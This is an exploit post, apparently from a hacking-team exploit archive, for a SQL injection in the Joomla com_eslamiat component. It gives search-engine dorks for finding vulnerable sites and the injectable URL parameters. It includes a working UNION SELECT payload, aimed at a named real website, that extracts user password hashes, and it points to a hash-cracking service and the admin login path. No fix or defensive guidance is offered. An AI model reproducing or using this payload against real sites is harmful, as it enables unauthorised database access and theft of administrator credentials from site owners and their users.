Joomla com_eslamiat Sql Injection Vulnerability

2012-06-06 01:52:16
Inviato da: siamak.black

-------------------- IN The NAme OF God --------------------

-====Joomla com_eslamiat Sql Injection Vulnerability====-

# Exploit Title: Joomla com_eslamiat Sql Injection Vulnerability
# Exploit Author: Siamak.Black
# Tested on: BackTrack , 7 , Redhat
# Version : 1.5
# Script Site : http://www.joomla.org
# MAil : [email protected]
# Home : IRaNHACK.ORG
# Team : IRANHACK SECURITY TEAM

-====Dork====-

inurl:index.php?option=com_eslamiat&Itemid=

inurl:com_eslamiat&Itemid=

-====Exploit====-

http://Site.CoM/index.php?option=com_eslamiat&Itemid=24&task=Maraghed&mode=[Sqli]

http://Site.CoM/index.php?option=com_eslamiat&Itemid=[Sqli]

-====Example====-

http://arabic.irib.ir/index.php?option=com_eslamiat&Itemid=24&task=Maraghed&mode=-912+/*!union*/+/*!select*/+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15+from+jos_users--

-====information====-

Crack Joomla Hash IN ~~~ > http://www.md5decrypter.co.uk/

Admin Page ~~~~~~~~~> Administrator

-====Tnx To====-

Persian Gulf For Ever ~~~~ > W3 Are Persian Hackerz

MR.XpR - Samim.s

Yaghi.Vahshi - HELLBOY - IrIsT - Black King - Monfared - Sokote_Vahshat ...

And All IraNHAck Security Team Members

iranhack.org

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.